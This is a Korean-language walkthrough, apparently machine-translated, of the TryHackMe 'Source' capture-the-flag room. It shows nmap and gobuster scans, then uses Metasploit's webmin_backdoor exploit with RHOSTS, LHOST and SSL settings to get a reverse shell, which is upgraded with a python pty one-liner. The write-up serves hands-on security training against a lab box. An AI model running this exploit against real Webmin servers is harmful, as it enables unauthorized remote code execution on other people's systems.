TryHackMe(THM)-소스 작성

3209 단어


원천



최근 취약점을 악용하여 웹 기반 시스템 구성 도구인 Webmin을 해킹합니다.

객실 링크는 여기link

작업 1




이 작업에 연결된 상자를 열거하고 루팅합니다. 중단의 원인을 발견하고 이를 활용하여 제어할 수 있습니까?

모든 챌린지에서와 같이 nmap으로 ip를 스캔하여 챌린지를 시작하겠습니다.
10.10.38.68 -> 소스.thm

nmap -sV -sC -A source.thm




출력:


  • 포트 22는 ssh용입니다.
  • 포트 10000이 webmin의 기본 포트입니다.

  • 링크는 다음과 같습니다.

    https://10.10.38.68:10000
    




    불행히도 우리는 ssh와 webmin에 대한 사용자 이름과 암호를 모르고 gobuster로 디렉토리를 검색하려고 시도했지만 아무것도 없습니다.

    gobuster dir -u https://10.10.38.68:10000 -w /usr/share/wordlists/dirb/common.txt
    




    마지막 옵션은 Metasploit에서 익스플로잇을 찾는 것이었습니다.



    그리고 네, 더 많은 취약점이 있으며 제가 사용한 익스플로잇은 5 “exploit/linux/http/webmin_backdoor” 입니다.



    이제 다음 명령에 따라 LPORT, RHOSTS 및 ssl을 true로 설정해야 합니다.

    set RHOSTS 10.10.38.68 (Machine IP)
    set LHOST 10.11.61.213 (YOUR IP)
    set ssl true
    


    이제 익스플로잇을 실행하려면 간단히 run/exploit를 입력하십시오.



    안정적인 쉘을 사용하려면 다음 명령을 실행하십시오.

    echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
    python /tmp/anyname.py
    


    그리고 붐!! 우리는 안정적인 껍질을 가지고 있습니다
    이제 우리가 해야 할 일은 깃발을 찾는 것뿐입니다.

    좋은 웹페이지 즐겨찾기